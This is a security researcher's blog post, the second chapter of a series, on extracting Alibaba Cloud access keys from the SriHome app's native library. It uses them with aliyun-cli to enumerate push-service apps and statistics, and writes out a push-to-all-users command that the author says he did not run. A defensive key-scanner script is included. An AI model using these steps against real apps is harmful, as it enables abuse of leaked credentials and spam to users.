Pwning SriHome: Chapter 2


Hold on a sec, did you check out the first chapter yet? If not, you might want to give it a read first. Head over there and catch up, then we’ll continue: Pwning SriHome: Chapter 1

Continuation

After successfully gaining access to their storage bucket and browsing through some files, I couldn’t shake the feeling that there might be more to uncover. So, I decided to backtrack to the initial point where I found the credentials - the libJNat.so file.

More Keys!

Since they were messing around with Alibaba’s cloud stuff, I thought, ‘Hey, there might be more sneaky credentials lying around.’ So, following GitGuardian’s lead with their fancy LT[A6]I pattern for access key IDs, I fired up a quick grep search. Lo and behold, I hit the jackpot - found another key along with its secret just hanging out there!

strings SriHome_21.9.24_Apkpure/lib/armeabi-v7a/libJNat.so | grep -A 1 'LT[A6]I'
LTAI...SSq
L01...BCd
--
LTA...CLu
J14...ESm

Note: Oh, and by the way, if you’re wondering why I used -A 1 in grep, it’s because it grabs one more line after the match, and that’s usually where the secret key hangs out, ’cause they come in pairs :P
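As an added example (my code, not from the original post), here is a small Python scanner that mirrors the strings | grep -A 1 'LT[A6]I' workflow so a team can run it over an APK’s native libraries before release and catch embedded AccessKeys early. The key-id length range and the 30-character AccessKey Secret length are assumptions of this example, and the sample bytes are constructed, not taken from libJNat.so.

```python
import re
import sys

# Alibaba Cloud AccessKey IDs begin with "LTAI" (older ones "LT6I"), the
# LT[A6]I pattern the post greps for; the key-id length range and the 30-char
# AccessKey Secret length are assumptions of this example, not from the post.
KEY_ID_RE = re.compile(rb"LT[A6]I[0-9A-Za-z]{12,20}")
SECRET_RE = re.compile(rb"^[0-9A-Za-z]{30}$")


def strings(data: bytes, min_len: int = 4):
    """Like the `strings` tool: runs of printable ASCII at least min_len long."""
    return [m.group(0) for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def find_keypairs(data: bytes):
    """Mirror `strings lib.so | grep -A 1 'LT[A6]I'`: return (key_id, secret)
    pairs, where secret is the next string only if it is shaped like an
    AccessKey Secret, else None (a lone key id is still worth reporting)."""
    strs = strings(data)
    pairs = []
    for i, s in enumerate(strs):
        m = KEY_ID_RE.search(s)
        if not m:
            continue
        nxt = strs[i + 1] if i + 1 < len(strs) else b""
        secret = nxt.decode() if SECRET_RE.match(nxt) else None
        pairs.append((m.group(0).decode(), secret))
    return pairs


def redact(value: str) -> str:
    """Report findings the way the post does (LTAI...SSq), never in full."""
    return value[:4] + "..." + value[-3:]


# Constructed sample bytes, not the real libJNat.so: one full key pair followed
# by a lone key id whose neighbouring string is not secret-shaped.
SAMPLE = b"\x00".join([
    b"\x7fELF\x01\x01junk",
    b"LTAI0000000000000000EXAM",
    b"0" * 26 + b"SECR",
    b"cloudpush.aliyuncs.com",
    b"LT6I0000000000000000TEST",
    b"\x01\x02\x03unrelated string",
])

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for key_id, secret in find_keypairs(blob):
        print(redact(key_id), redact(secret) if secret else "<no secret adjacent>")
```

Pass a real .so path as the first argument to scan a build artifact; with no argument it runs over the constructed sample.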

Alright, let’s set up that second batch of credentials with aliyun-cli, but this time, let’s name the profile sricam to keep things organized.

aliyun configure --profile sricam
Configuring profile 'sricam' in 'AK' authenticate mode...
Access Key Id []: LTA......SSq
Access Key Secret []: L01......BCd
Default Region Id []: us-west-1
Default Output Format [json]: json (Only support json)
Default Language [zh|en] en:
Saving profile[sricam] ...Done.

Configure Done!!!

However, it seems that these credentials don’t grant access to any OSS buckets.

aliyun oss ls --profile sricam
ERROR: oss: service returned error: StatusCode=403, ErrorCode=AccessDenied, ErrorMessage="You are forbidden to list buckets.", RequestId=65D65B9DE2741F35326A81C4, Ec=0003-00000202

I gave both sets of credentials a spin across common services like ecs, rds, and cloudapi, but no luck. It seems they didn’t have access to any of those.

I hit a bit of a roadblock, so I decided to try something different. I started poking around by grepping for the strings ‘alibaba’ and ‘aliyun’ in the libJNat.so file. I found a match for “cloudpush.aliyuncs.com”.

strings SriHome_21.9.24_Apkpure/lib/armeabi-v7a/libJNat.so | grep alibaba

strings SriHome_21.9.24_Apkpure/lib/armeabi-v7a/libJNat.so | grep aliyun
cloudpush.aliyuncs.com

Then, while I was at it, I decided to grep for the word ‘push’ and stumbled upon ‘ali push’. A quick Google search later, and it turns out it’s a message push service.

strings SriHome_21.9.24_Apkpure/lib/armeabi-v7a/libJNat.so | grep push
...
ali push
cloudpush.aliyuncs.com
push success to:%s title:%s body:%s
...

I also went the extra mile and confirmed that the application was indeed using the push service by decompiling it with jadx. Here’s what I found:

Alright, now that we know it’s definitely utilizing the message push service, let’s brainstorm some ways to leverage it.

After digging through aliyun push --help, I stumbled upon ListSummaryApps, a command that lists all the applications using the push service.

aliyun push ListSummaryApps
{
	"RequestId": "22E9DE0F-7EF6-5E2A-BECC-D8156431D2A8",
	"SummaryAppInfos": {
		"SummaryAppInfo": [
			{
				"AppKey": 25539843,
				"AppName": "ifHome"
			},
			{
				"AppKey": 25548841,
				"AppName": "SriHomeNew"
			},
			{
				"AppKey": 24738117,
				"AppName": "SriHome"
			},
			{
				"AppKey": 24732061,
				"AppName": "ifHome"
			}
		]
	}
}

Sweet! With the AppKeys for all the applications in hand, let’s dive deeper and gather some statistics using QueryPushStatByApp.

aliyun push QueryPushStatByApp --AppKey 24738117 --StartTime 2024-01-01T00:00:00Z --EndTime 2024-02-01T00:00:00Z --Granularity DAY
{
	"AppPushStats": {
		"AppPushStat": [
			{
				"AcceptCount": 6331760,
				"DeletedCount": 0,
				"OpenedCount": 11851,
				"ReceivedCount": 5022263,
				"SentCount": 5023691,
				"Time": "2023-12-31T16:00:00Z"
			},
			{
				"AcceptCount": 6242835,
				"DeletedCount": 0,
				"OpenedCount": 10946,
				"ReceivedCount": 4937240,
				"SentCount": 4938704,
				"Time": "2024-01-01T16:00:00Z"
			},
			...
			...
			

Alright, querying data is cool, but let’s spice things up a bit. How about we take a peek at PushNoticeToAndroid? Now, that sounds interesting!

After a quick glance through the docs, it seems we’ll need:

  • AppKey - we got these!
  • Target - ALL, DEVICE, ACCOUNT, ALIAS, TAG (available options)
  • TargetValue - set according to Target. Use commas to separate multiple values. If the limit is exceeded, you need to push it multiple times.
      Target=DEVICE, the value is as follows: deviceid111,deviceid1111 (up to 1000 supported).
      Target=ACCOUNT, the value is as follows: account111,account222 (up to 1000 supported).
      Target=ALIAS, the value is as follows: alias111,alias222 (up to 1000 supported).
      Target=TAG, supports a single Tag and multiple Tags. For the format, please refer to Tag Format.
      Target=ALL, the value is ALL.
  • Title
  • Body

aliyun push PushNoticeToAndroid --AppKey 25548841 --Target ALL --TargetValue ALL --Title deathflash --Body Pwned

Alright, so if I ran the above, it would shoot out a notification to all Android app users with the title “deathflash” and “Pwned” as the content… quite tempting, but let’s hold off on that, shall we?

Conclusion

Even a basic service like mobile push, it turns out, can be exploited to harm application users with alarming ease.